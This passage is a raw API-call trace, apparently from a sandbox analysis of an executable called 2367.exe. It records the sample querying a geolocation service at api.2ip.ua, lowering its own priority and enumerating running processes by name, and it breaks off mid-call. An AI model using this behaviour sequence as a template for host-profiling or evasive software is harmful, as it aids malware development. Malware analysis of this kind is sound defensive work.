[0060.431] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32012f8, Size=0x60) returned 0x32012f8 [0060.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0060.431] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x29) returned 0x31fb110 [0060.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x31fb110, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0060.431] GetLastError () returned 0x0 [0060.431] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32012f8) returned 0x60 [0060.432] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32012f8, Size=0x64) returned 0x32012f8 [0060.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0060.432] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x1e) returned 0x31fef90 [0060.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x31fef90, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0060.432] GetLastError () returned 0x0 [0060.432] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32012f8) returned 0x64 [0060.432] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32012f8, Size=0x68) returned 0x32012f8 [0060.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0060.432] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x41) returned 0x31f6bf8 [0060.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x31f6bf8, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0060.432] GetLastError () returned 0x0 [0060.432] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32012f8) returned 0x68 [0060.432] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32012f8, Size=0x6c) returned 0x32012f8 [0060.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0060.432] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x17) returned 0x3201370 [0060.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x3201370, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0060.432] GetLastError () returned 0x0 [0060.432] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32012f8) returned 0x6c [0060.432] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32012f8, Size=0x70) returned 0x32012f8 [0060.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0060.432] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0xf) returned 0x31fe690 [0060.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x31fe690, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0060.432] GetLastError () returned 0x0 [0060.432] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32012f8) returned 0x70 [0060.432] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32012f8, Size=0x74) returned 0x3201390 [0060.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0060.432] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x16) returned 0x32012f8 [0060.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x32012f8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0060.432] GetLastError () returned 0x0 [0060.432] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3201390) returned 0x74 [0060.432] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x3201390, Size=0x78) returned 0x3201390 [0060.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0060.432] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x2a) returned 0x31fb148 [0060.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x31fb148, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0060.433] GetLastError () returned 0x0 [0060.433] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3201390) returned 0x78 [0060.433] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x3201390, Size=0x7c) returned 0x3201390 [0060.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0060.433] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x29) returned 0x31fb180 [0060.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x31fb180, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0060.433] GetLastError () returned 0x0 [0060.433] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3201390) returned 0x7c [0060.433] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x3201390, Size=0x80) returned 0x3201390 [0060.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0060.433] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x15) returned 0x3201318 [0060.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x3201318, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0060.433] GetLastError () returned 0x0 [0060.433] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3201390) returned 0x80 [0060.433] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x3201390, Size=0x84) returned 0x3201390 [0060.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0060.433] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x1e) returned 0x31fefb8 [0060.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x31fefb8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0060.433] GetLastError () returned 0x0 [0060.433] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3201390) returned 0x84 [0060.433] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x3201390, Size=0x88) returned 0x3201390 [0060.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0060.433] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x2a) returned 0x31fb1b8 [0060.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x31fb1b8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0060.433] GetLastError () returned 0x0 [0060.433] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3201390) returned 0x88 [0060.433] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x3201390, Size=0x8c) returned 0x3201390 [0060.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0060.433] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x12) returned 0x3201338 [0060.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x3201338, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0060.433] GetLastError () returned 0x0 [0060.433] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3201390) returned 0x8c [0060.434] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x3201390, Size=0x90) returned 0x3201390 [0060.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0060.434] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x18) returned 0x3201428 [0060.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x3201428, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0060.434] GetLastError () returned 0x0 [0060.434] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3201390) returned 0x90 [0060.434] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x3201390, Size=0x94) returned 0x3201448 [0060.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0060.434] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x46) returned 0x31f6c48 [0060.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x31f6c48, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0060.434] GetLastError () returned 0x0 [0060.434] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3201448) returned 0x94 [0060.434] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x3201448, Size=0x98) returned 0x3201448 [0060.434] GetLastError () returned 0x0 [0060.434] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3200e08) returned 0x80 [0060.434] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3200e08) returned 0x80 [0060.435] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3200e08) returned 0x80 [0060.435] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x8ec) returned 0x32014e8 [0060.435] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3200e08) returned 0x80 [0060.435] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x10) returned 0x31fe6a8 [0060.435] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3200e08) returned 0x80 [0060.435] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3200e08) returned 0x80 [0060.436] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3200e08) returned 0x80 [0060.436] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3200e08) returned 0x80 [0060.501] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0062.308] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x40) returned 0x31f5b70 [0062.308] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0109.385] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x31f5b70 | out: hHeap=0x31e0000) returned 1 [0109.386] GetCurrentProcess () returned 0xffffffff [0109.386] GetLastError () returned 0x2efe [0109.386] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0109.386] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x10) returned 0x32166f8 [0109.386] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x8ec) returned 0x5cdbc00 [0109.386] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x800) returned 0x5d419d8 [0109.386] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5d419d8, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2367.exe")) returned 0x2e [0109.386] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0109.386] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x810) returned 0x5d3d9d8 [0109.386] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe\" " [0109.386] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe\" ", pNumArgs=0x18dea0 | out: pNumArgs=0x18dea0) returned 0x32b2920*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" [0109.387] lstrcpyW (in: lpString1=0x18eb30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" [0109.387] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe\" " [0109.387] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe\" ", pNumArgs=0x18de3c | out: pNumArgs=0x18de3c) returned 0x32b2920*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" [0109.387] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe") returned="2367.exe" [0109.387] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0109.388] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcesses") returned 0x0 [0109.388] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcessModules") returned 0x0 [0109.389] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleBaseNameW") returned 0x0 [0109.389] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77060000 [0109.392] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcesses") returned 0x77061544 [0109.393] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0109.393] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameW") returned 0x7706152c [0109.393] EnumProcesses (in: lpidProcess=0x183638, cb=0xa000, lpcbNeeded=0x18de48 | out: lpidProcess=0x183638, lpcbNeeded=0x18de48) returned 1 [0109.395] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0109.395] CloseHandle (hObject=0x0) returned 0 [0109.395] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0109.395] CloseHandle (hObject=0x0) returned 0 [0109.396] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0109.396] CloseHandle (hObject=0x0) returned 0 [0109.396] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0109.396] CloseHandle (hObject=0x0) returned 0 [0109.396] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0109.396] CloseHandle (hObject=0x0) returned 0 [0109.396] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0109.396] CloseHandle (hObject=0x0) returned 0 [0109.396] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0109.396] CloseHandle (hObject=0x0) returned 0 [0109.396] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0109.396] CloseHandle (hObject=0x0) returned 0 [0109.396] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0109.396] CloseHandle (hObject=0x0) returned 0 [0109.396] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0109.397] CloseHandle (hObject=0x0) returned 0 [0109.397] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0109.397] CloseHandle (hObject=0x0) returned 0 [0109.397] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0109.397] CloseHandle (hObject=0x0) returned 0 [0109.397] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0109.397] CloseHandle (hObject=0x0) returned 0 [0109.397] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0109.397] CloseHandle (hObject=0x0) returned 0 [0109.397] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0109.397] CloseHandle (hObject=0x0) returned 0 [0109.397] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0109.397] CloseHandle (hObject=0x0) returned 0 [0109.397] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0109.397] CloseHandle (hObject=0x0) returned 0 [0109.397] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0109.398] CloseHandle (hObject=0x0) returned 0 [0109.398] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x3e4 [0109.398] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 0 [0109.398] CloseHandle (hObject=0x3e4) returned 1 [0109.398] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x3e4 [0109.398] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 0 [0109.398] CloseHandle (hObject=0x3e4) returned 1 [0109.398] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x0 [0109.398] CloseHandle (hObject=0x0) returned 0 [0109.398] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0109.398] CloseHandle (hObject=0x0) returned 0 [0109.398] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3e4 [0109.398] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 0 [0109.399] CloseHandle (hObject=0x3e4) returned 1 [0109.399] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x3e4 [0109.399] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 0 [0109.399] CloseHandle (hObject=0x3e4) returned 1 [0109.399] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x71c) returned 0x3e4 [0109.399] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.400] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x1300000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="macedonia.exe") returned 0xd [0109.401] CloseHandle (hObject=0x3e4) returned 1 [0109.401] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x3e4 [0109.401] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.402] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x970000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="tramadol.exe") returned 0xc [0109.403] CloseHandle (hObject=0x3e4) returned 1 [0109.403] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x53c) returned 0x3e4 [0109.403] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.404] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x1160000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="reloadmichelle.exe") returned 0x12 [0109.404] CloseHandle (hObject=0x3e4) returned 1 [0109.405] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x604) returned 0x3e4 [0109.405] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.406] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x11d0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="foot grants.exe") returned 0xf [0109.406] CloseHandle (hObject=0x3e4) returned 1 [0109.406] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c4) returned 0x3e4 [0109.407] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.408] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x10d0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="highland.exe") returned 0xc [0109.408] CloseHandle (hObject=0x3e4) returned 1 [0109.408] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x240) returned 0x3e4 [0109.408] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.410] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xd10000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="partiallynvk.exe") returned 0x10 [0109.410] CloseHandle (hObject=0x3e4) returned 1 [0109.410] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c0) returned 0x3e4 [0109.410] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.411] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0xe00000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="latino subject bill.exe") returned 0x17 [0109.412] CloseHandle (hObject=0x3e4) returned 1 [0109.412] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x114) returned 0x3e4 [0109.412] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, 